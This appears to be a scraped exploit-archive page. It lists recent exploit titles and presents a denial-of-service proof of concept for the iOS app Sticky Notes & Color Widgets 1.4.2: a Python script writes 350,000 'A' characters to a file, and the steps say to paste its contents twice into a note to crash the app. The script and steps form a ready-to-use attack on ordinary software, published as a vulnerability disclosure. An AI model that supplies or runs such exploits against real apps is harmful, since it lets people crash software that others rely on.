d6a44bd00b
11 changes to exploits/shellcodes Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated) WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)
35 lines
No EOL
1,022 B
Python
Executable file
35 lines
No EOL
1,022 B
Python
Executable file
# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
|
|
# Date: 06-04-2021
|
|
# Author: Geovanni Ruiz
|
|
# Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010
|
|
# Version: 1.4.2
|
|
# Category: DoS (iOS)
|
|
|
|
##### Vulnerability #####
|
|
|
|
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
|
|
|
|
# STEPS #
|
|
# Open the program.
|
|
# Create a new Note.
|
|
# Run the python exploit script payload.py, it will create a new payload.txt file
|
|
# Copy the content of the file "payload.txt"
|
|
# Paste the content from payload.txt twice in the new Note.
|
|
# Crashed
|
|
|
|
Successful exploitation will cause the application to stop working.
|
|
|
|
I have been able to test this exploit against iOS 14.2.
|
|
|
|
##### PoC #####
|
|
--> payload.py <--
|
|
#!/usr/bin/env python
|
|
buffer = "\x41" * 350000
|
|
|
|
try:
|
|
f = open("payload.txt","w")
|
|
f.write(buffer)
|
|
f.close()
|
|
print ("File created")
|
|
except:
|
|
print ("File cannot be created") |